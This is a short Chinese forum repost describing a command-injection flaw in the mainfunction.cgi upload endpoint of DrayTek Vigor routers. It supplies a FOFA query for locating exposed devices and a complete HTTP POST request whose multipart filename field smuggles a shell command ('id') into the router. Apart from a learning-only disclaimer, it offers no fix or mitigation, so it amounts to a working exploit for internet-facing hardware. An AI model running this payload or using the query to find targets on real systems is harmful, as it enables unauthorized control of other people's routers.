DrayTek Vigor路由器mainfunction.cgi接口存在命令执行漏洞-网络安全论坛-网络安全-阻击者联盟

DrayTek Vigor路由器mainfunction.cgi接口存在命令执行漏洞

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. DrayTek Vigor路由器简介

微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

DrayTek Vigor路由器

2.漏洞描述

DrayTek Vigor路由器mainfunction.cgi接口存在命令执行漏洞

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

DrayTek Vigor路由器

d2b5ca33bd20251031070934

DrayTek Vigor路由器mainfunction.cgi接口存在命令执行漏洞

4.fofa查询语句

“excanvas.js” && “lang == “zh-cn”” && “detectLang” && server==”DWS”

5.漏洞复现

漏洞链接:http://x.xx.xx.xx/cgi-bin/mainfunction.cgi/cvmcfgupload?1=2

漏洞数据包:

POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1
Content-Type: multipart/form-data; boundary=15a8dd5836cf956b12af7bba793e4367
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: xx.xx.xx.xx
Content-Length: 184
Connection: close

--15a8dd5836cf956b12af7bba793e4367
Content-Disposition: form-data; name="abc"; filename="t';id;echo '1_"
Content-Type: text/x-python-script

 
--15a8dd5836cf956b12af7bba793e4367--

d2b5ca33bd20251031070954

 

请登录后发表评论

    没有回复内容